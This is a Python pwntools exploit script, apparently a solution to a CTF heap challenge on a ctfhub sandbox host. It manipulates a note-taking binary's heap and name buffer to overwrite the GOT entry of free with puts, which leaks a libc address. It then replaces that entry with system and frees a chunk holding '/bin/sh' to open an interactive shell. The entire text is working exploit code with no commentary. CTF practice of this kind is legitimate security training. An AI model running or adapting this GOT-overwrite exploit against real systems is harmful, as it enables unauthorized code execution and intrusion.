from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",26124)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size):
ru(b"Your choice >> \n")
sl(b"1")
ru(b"size:\n")
sl(str(size))
def edit(idx,data):
ru(b"Your choice >> \n")
sl(b"2")
ru(b"Which page do you want to edit?")
sl(str(idx))
ru(b"Input your content:")
s(data)
def free(idx):
ru(b"Your choice >> \n")
sl(b"3")
ru(b"Which page do you want to delete?")
sl(str(idx))
def name(data):
ru(b"Your choice >> \n")
sl(b"4")
ru(b"Your new name:")
s(data)
def message(size,data1,data2):
ru(b"Your choice >> \n")
sl(b"5")
global chunk_0
ru(b"Your message is saved at ")
chunk_0 = int(r(9),16)
print("message_chunk---------------->: ",hex(chunk_0))
ru(b"Your size of new message:")
sl(str(size))
ru(b'Input your new message:')
s(data1)
ru(b"Oh,I'm sorry,maybe you should say goodbye to the old message:")
s(p64(name_addr-0x10)+p64(name_addr-0x10))
ru(b"Now,please input your name,Mr. writer:")
sl(b"aaaa")
ru(b"And write some message for your book?")
sl(b"bbbb")
add(0x80)
page_list = 0x602100
message_addr = 0x6020E0
name_addr =0x6020A0
message(0xee,b"a",b"\x28")
name(p64(chunk_0-0x10)*2)
add(0xb0)
add(0xb0)
free_got = elf.got['free']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = b"a"*0x60+p64(free_got)+p64(puts_got)
edit(2,payload)
edit(0,p64(puts_plt))
free(1)
ru(b"\n")
puts_addr = uu64(r(6))
libc_base = puts_addr-libc.sym['puts']
system_addr = libc_base+libc.sym['system']
print("libc_base-------------->: ",hex(libc_base))
edit(0,p64(system_addr))
edit(2,b"/bin/sh\x00")
free(2)
itr()